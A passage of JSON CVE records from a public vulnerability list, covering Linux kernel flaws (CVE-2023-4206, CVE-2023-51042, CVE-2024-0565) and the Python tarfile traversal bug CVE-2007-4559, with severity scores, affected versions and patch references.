"8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/fda6c89fe3d9aca073495a664e1d5aea28cd4377" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fda6c89fe3d9aca073495a664e1d5aea28cd4377" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.1.13" }, { "url": "https://security.netapp.com/advisory/ntap-20230316-0009/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-26545", "datePublished": "2023-02-25T00:00:00", "dateReserved": "2023-02-25T00:00:00", "dateUpdated": "2024-08-02T11:53:53.581Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4206
Vulnerability from cvelistv5
Published
2023-09-06 13:53
Modified
2024-08-02 07:17
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's net/sched: cls_route component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:17:12.232Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.5", "status": "affected", "version": "3.18", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "valis" }, { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Bing-Jhong Billy Jheng" } ], "datePublic": "2023-08-01T03:10:37+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_route component can be exploited to achieve local privilege escalation.\n\nWhen route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-06T13:53:05.197Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8" }, { "url": "https://kernel.dance/b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8" }, { "url": "https://www.debian.org/security/2023/dsa-5492" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_route component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-4206", "datePublished": "2023-09-06T13:53:05.197Z", "dateReserved": "2023-08-07T13:02:24.450Z", "dateUpdated": "2024-08-02T07:17:12.232Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-51042
Vulnerability from cvelistv5
Published
2024-01-23 00:00
Modified
2024-10-03 20:40
Severity ?
EPSS score ?
Summary
In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:23:44.170Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.12" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628" } ], "title": "CVE Program Container" }, { "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-51042", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-05-10T04:00:10.467019Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-03T20:40:38.677Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-23T10:10:48.855053", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.12" }, { "url": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-51042", "datePublished": "2024-01-23T00:00:00", "dateReserved": "2023-12-18T00:00:00", "dateUpdated": "2024-10-03T20:40:38.677Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-0565
Vulnerability from cvelistv5
Published
2024-01-15 20:02
Modified
2024-09-13 23:36
Severity ?
EPSS score ?
Summary
Kernel: cifs filesystem decryption improper input validation remote code execution vulnerability in function receive_encrypted_standard of client
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:1188 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1404 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1532 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1533 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1607 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1614 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2093 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2024-0565 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2258518 | issue-tracking, x_refsource_REDHAT | |
https://www.spinics.net/lists/stable-commits/msg328851.html |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T18:11:35.146Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:1532", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1532" }, { "name": "RHSA-2024:1533", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1533" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0565" }, { "name": "RHBZ#2258518", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://www.spinics.net/lists/stable-commits/msg328851.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://git.kernel.org/pub/scm/linux/kernel", "defaultStatus": "unaffected", "packageName": "kernel", "versions": [ { "lessThan": "6.7-rc6", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.rt7.326.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.59.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.59.1.rt14.344.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-16", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-408", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-480", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-9", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-248", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.14.6-215", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/kibana6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-431", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-228", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-471", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-15", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-3", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-27", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-12", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-527", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-225", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-57", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-18T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-191", "description": "Integer Underflow (Wrap or Wraparound)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:36:43.192Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:1532", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1532" }, { "name": "RHSA-2024:1533", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1533" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0565" }, { "name": "RHBZ#2258518", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518" }, { "url": "https://www.spinics.net/lists/stable-commits/msg328851.html" } ], "timeline": [ { "lang": "en", "time": "2024-01-15T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-18T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: cifs filesystem decryption improper input validation remote code execution vulnerability in function receive_encrypted_standard of client", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-191: Integer Underflow (Wrap or Wraparound)" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-0565", "datePublished": "2024-01-15T20:02:02.639Z", "dateReserved": "2024-01-15T19:19:12.076Z", "dateUpdated": "2024-09-13T23:36:43.192Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2007-4559
Vulnerability from cvelistv5
Published
2007-08-28 00:00
Modified
2024-08-07 15:01
Severity ?
EPSS score ?
Summary
Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-07T15:01:09.683Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CVBB7NU3YIRRDOKLYVN647WPRR3IAKR6/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FI55PGL47ES3OU2FQPGEHOI2EK3S2OBH/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KA4Z44ZAI4SY7THCFBUDNT5EEFO4XQ3A/" }, { "name": "26623", "tags": [ "third-party-advisory", "x_transferred" ], "url": "http://secunia.com/advisories/26623" }, { "name": "ADV-2007-3022", "tags": [ "vdb-entry", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2007/3022" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=263261" }, { "name": "[python-dev] 20070824 tarfile and directory traversal vulnerability", "tags": [ "mailing-list", "x_transferred" ], "url": "http://mail.python.org/pipermail/python-dev/2007-August/074290.html" }, { "name": "[python-dev] 20070825 tarfile and directory traversal vulnerability", "tags": [ "mailing-list", "x_transferred" ], "url": "http://mail.python.org/pipermail/python-dev/2007-August/074292.html" }, { "name": "GLSA-202309-06", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202309-06" }, { "name": "FEDORA-2024-d1f1084584", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FI55PGL47ES3OU2FQPGEHOI2EK3S2OBH/" }, { "name": "FEDORA-2024-ebb3c95344", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CVBB7NU3YIRRDOKLYVN647WPRR3IAKR6/" }, { "name": "FEDORA-2024-46374d2703", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KA4Z44ZAI4SY7THCFBUDNT5EEFO4XQ3A/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", 